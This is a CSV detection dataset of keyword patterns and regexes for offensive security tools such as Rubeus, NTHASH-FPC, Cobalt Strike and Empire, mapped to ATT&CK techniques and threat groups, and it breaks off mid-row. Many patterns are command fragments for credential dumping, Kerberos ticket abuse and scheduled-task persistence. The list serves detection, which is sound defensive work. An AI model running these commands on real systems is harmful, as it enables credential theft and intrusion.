"keyword","metadata_keyword_regex","metadata_keyword_type","metadata_tool","metadata_description","metadata_tool_techniques","metadata_tool_tactics","metadata_malwares_name","metadata_groups_name","metadata_category","metadata_link","metadata_enable_endpoint_detection","metadata_enable_proxy_detection","metadata_comment","metadata_severity_score","metadata_popularity_score","metadata_github_stars","metadata_github_forks","metadata_github_updated_at","metadata_github_created_at" "* - Bypassing UAC with SSPI Datagram Contexts*",".{0,1000}\s\-\sBypassing\sUAC\swith\sSSPI\sDatagram\sContexts.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "* - delete: Delete a scheduled task. Requires restarting the *",".{0,1000}\s\-\sdelete\:\sDelete\sa\sscheduled\stask\.\sRequires\srestarting\sthe\s.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","#contentstrings","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "* Execute command elevated through Run Dialog*",".{0,1000}\s\sExecute\scommand\selevated\sthrough\sRun\sDialog.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "* Execute command elevated through task manager*",".{0,1000}\s\sExecute\scommand\selevated\sthrough\stask\smanager.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "* --LocalGMEnum --Host *",".{0,1000}\s\s\-\-LocalGMEnum\s\-\-Host\s.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "* - Removed disabled accounts from spraying*",".{0,1000}\s\-\sRemoved\sdisabled\saccounts\sfrom\sspraying.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","#contentstrings","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* - Sensitive Accounts.csv*",".{0,1000}\s\-\sSensitive\sAccounts\.csv.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "* - ShadowSpray*",".{0,1000}\s\-\sShadowSpray.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "* $exploit_oneliner*",".{0,1000}\s\$exploit_oneliner.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "* $FodHelperPath*",".{0,1000}\s\$FodHelperPath.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-FodHelperBypass.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* $KerbDump*",".{0,1000}\s\$KerbDump.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* $lse_find_opts *",".{0,1000}\s\$lse_find_opts\s.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "* $payload_oneliner *",".{0,1000}\s\$payload_oneliner\s.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "* * 0x* - HOOK DETECTED*",".{0,1000}\s.{0,1000}\s0x.{0,1000}\s\-\sHOOK\sDETECTED.{0,1000}","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "* */lsass.o*",".{0,1000}\s.{0,1000}\/lsass\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","0","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "* ./sf.py -l 127.0.0.1:5001*",".{0,1000}\s\.\/sf\.py\s\-l\s127\.0\.0\.1\:5001.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "* ./tor.keyring *",".{0,1000}\s\.\/tor\.keyring\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* .\tor.keyring *",".{0,1000}\s\.\\tor\.keyring\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* .beacon_keys -*",".{0,1000}\s\.beacon_keys\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "* /.exegol/*",".{0,1000}\s\/\.exegol\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* /altservice:ldap *",".{0,1000}\s\/altservice\:ldap\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /asrepkey*",".{0,1000}\s\/asrepkey.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /changentlm* /user:* /oldhash:*",".{0,1000}\s\/changentlm.{0,1000}\s\/user\:.{0,1000}\s\/oldhash\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /changentlm* /user:* /oldpwd:*",".{0,1000}\s\/changentlm.{0,1000}\s\/user\:.{0,1000}\s\/oldpwd\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /changentlm* /user:* /oldpwd:*",".{0,1000}\s\/changentlm.{0,1000}\s\/user\:.{0,1000}\s\/oldpwd\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /cmdtech:* /cmd:* /impuser:*",".{0,1000}\s\/cmdtech\:.{0,1000}\s\/cmd\:.{0,1000}\s\/impuser\:.{0,1000}","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","1","87","17","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" "* /cmdtech:* /cmd:* /query:*",".{0,1000}\s\/cmdtech\:.{0,1000}\s\/cmd\:.{0,1000}\s\/query\:.{0,1000}","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","1","87","17","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" "* /create /tn Notion /tr \*cmd.exe* -c *\* /sc onlogon /ru System\*",".{0,1000}\s\/create\s\/tn\sNotion\s\/tr\s\\.{0,1000}cmd\.exe.{0,1000}\s\-c\s.{0,1000}\\.{0,1000}\s\/sc\sonlogon\s\/ru\sSystem\\.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "* /createnetonly:*cmd.exe*",".{0,1000}\s\/createnetonly\:.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /createnetonly:*cmd.exe*",".{0,1000}\s\/createnetonly\:.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /credpassword*",".{0,1000}\s\/credpassword.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /creduser:* /credpassword:*",".{0,1000}\s\/creduser\:.{0,1000}\s\/credpassword\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /decodemk /binary:* /password:*",".{0,1000}\s\/decodemk\s\/binary\:.{0,1000}\s\/password\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /dumpsecret /input:* /system*",".{0,1000}\s\/dumpsecret\s\/input\:.{0,1000}\s\/system.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /dumpsecret /input:defaultpassword*",".{0,1000}\s\/dumpsecret\s\/input\:defaultpassword.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /dumpsecret /input:dpapi_system /offline*",".{0,1000}\s\/dumpsecret\s\/input\:dpapi_system\s\/offline.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /gethmac /mode:hashid /input:* /key:*",".{0,1000}\s\/gethmac\s\/mode\:hashid\s\/input\:.{0,1000}\s\/key\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /getlsasecret /input:*",".{0,1000}\s\/getlsasecret\s\/input\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /getntlmhash /password:*",".{0,1000}\s\/getntlmhash\s\/password\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /getntlmhash | wtee *.ntlm*",".{0,1000}\s\/getntlmhash\s\|\swtee\s.{0,1000}\.ntlm.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /getsamkey /offline*",".{0,1000}\s\/getsamkey\s\/offline.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /impersonateuser:* /msdsspn:* /ptt*",".{0,1000}\s\/impersonateuser\:.{0,1000}\s\/msdsspn\:.{0,1000}\s\/ptt.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /ldap * /printcmd*",".{0,1000}\s\/ldap\s.{0,1000}\s\/printcmd.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /ldapfilter:'admincount=1'*",".{0,1000}\s\/ldapfilter\:\'admincount\=1\'.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /modules:* /target:* /linkedsql:*",".{0,1000}\s\/modules\:.{0,1000}\s\/target\:.{0,1000}\s\/linkedsql\:.{0,1000}","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - 